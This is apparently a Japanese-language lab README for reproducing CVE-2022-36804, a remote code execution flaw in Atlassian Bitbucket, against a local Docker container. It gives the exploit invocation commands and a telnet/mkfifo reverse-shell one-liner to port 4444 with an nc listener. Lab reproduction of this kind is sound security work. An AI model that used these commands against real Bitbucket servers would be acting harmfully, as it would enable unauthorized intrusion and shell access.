
⚠️ 教育および許可されたセキュリティ研究目的のみに使用してください
オリジナルのPoC作者である Walnut Security Services Pvt. Ltd に非常に感謝します。
Atlassian Bitbucket Server and Data Center のバージョン 7.0.0 から 7.6.17 未満、7.7.0 から 7.17.10 未満、7.18.0 から 7.21.4 未満、8.0.0 から 8.0.3 未満、8.1.0 から 8.1.3 未満、8.2.0 から 8.2.2 未満、8.3.0 から 8.3.1 未満の複数のAPIエンドポイントでは、公開または非公開のBitbucketリポジトリに対する読み取り権限を持つリモート攻撃者が、悪意のあるHTTPリクエストを送信することで任意のコードを実行できる可能性があります。この脆弱性は、TheGrandPew 氏によって私たちのバグ報奨金プログラムを通じて報告されました。
まず、リポジトリをクローンします
git clone https://github.com/asepsaepdin/CVE-2022-36804.git
ディレクトリを変更します
cd CVE-2022-36804
脆弱性コンテナをビルドします
docker build -t CVE-2022-36804 .
一時コンテナを実行します
docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
コンテナのIPアドレスを確認します
docker inspect CVE-2022-36804 | grep "IPAddress"
Atlassian Bitbucket をセットアップし、URL http://172.17.0.3:7990 を開いて新しい公開リポジトリを作成します
リモートコード実行(RCE)を確認します
python3 cve-2022-36804.py -u http://172.17.0.3:7990
カスタマイズしたコマンド(cmd)でRCEを確認します
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
攻撃者の視点では、リモートコード実行は対話型シェルへのアクセスを獲得するために極めて重要です。したがって、以下のコマンドを実行すると、攻撃者のシステムのポート 4444/tcp に対して、bash ベースの telnet リバースシェルが TCP 上で起動します。
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
nc -nlvp 4444